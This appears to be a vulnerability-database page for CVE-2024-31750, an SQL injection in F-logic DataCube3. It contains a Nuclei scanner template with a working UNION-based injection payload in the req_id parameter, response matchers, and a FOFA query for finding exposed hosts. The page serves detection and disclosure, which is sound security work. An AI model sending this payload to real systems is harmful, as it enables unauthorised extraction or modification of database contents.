CVE-2024-31750: F-logic DataCube3 - SQL Injection

2025-08-01 F-logic DataCube3 PoC Public

Description

SQL injection vulnerability in f-logic datacube3 v.1.0 allows a remote attacker to obtain sensitive information via the req_id parameter.

PoC

id: CVE-2024-31750

info:
  name: F-logic DataCube3 - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    SQL injection vulnerability in f-logic datacube3 v.1.0 allows a remote attacker to obtain sensitive information via the req_id parameter.
  impact: |
    Attackers can execute arbitrary SQL queries, potentially extracting or modifying sensitive database information.
  remediation: |
    Update F-logic DataCube3 to a version that patches the SQL injection vulnerability.
  reference:
    - https://github.com/lampSEC/semcms/blob/main/datacube3.md
    - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/DataCube3%20getting_index_data.php%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
    - https://nvd.nist.gov/vuln/detail/CVE-2024-31750
    - https://github.com/wjlin0/poc-doc
    - https://github.com/wy876/POC
  classification:
    cve-id: CVE-2024-31750
    epss-score: 0.1927
    epss-percentile: 0.97196
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="DataCube3"
  tags: cve,cve2024,datacube3,sqli,vkev,vuln

http:
  - raw:
      - |
        POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        req_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq")'
          - 'contains(header, "application/json")'
          - 'status_code==200'
        condition: and
# digest: 4a0a00473045022100cca1e0661bc4f0b20bf4ebf636387dd35d3348231f31c4885abd8bd9a5d68ba20220633ca84154cf6d546fb02d09cc42108c7fbeb5d4629462dedcdabea04c3b3941:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities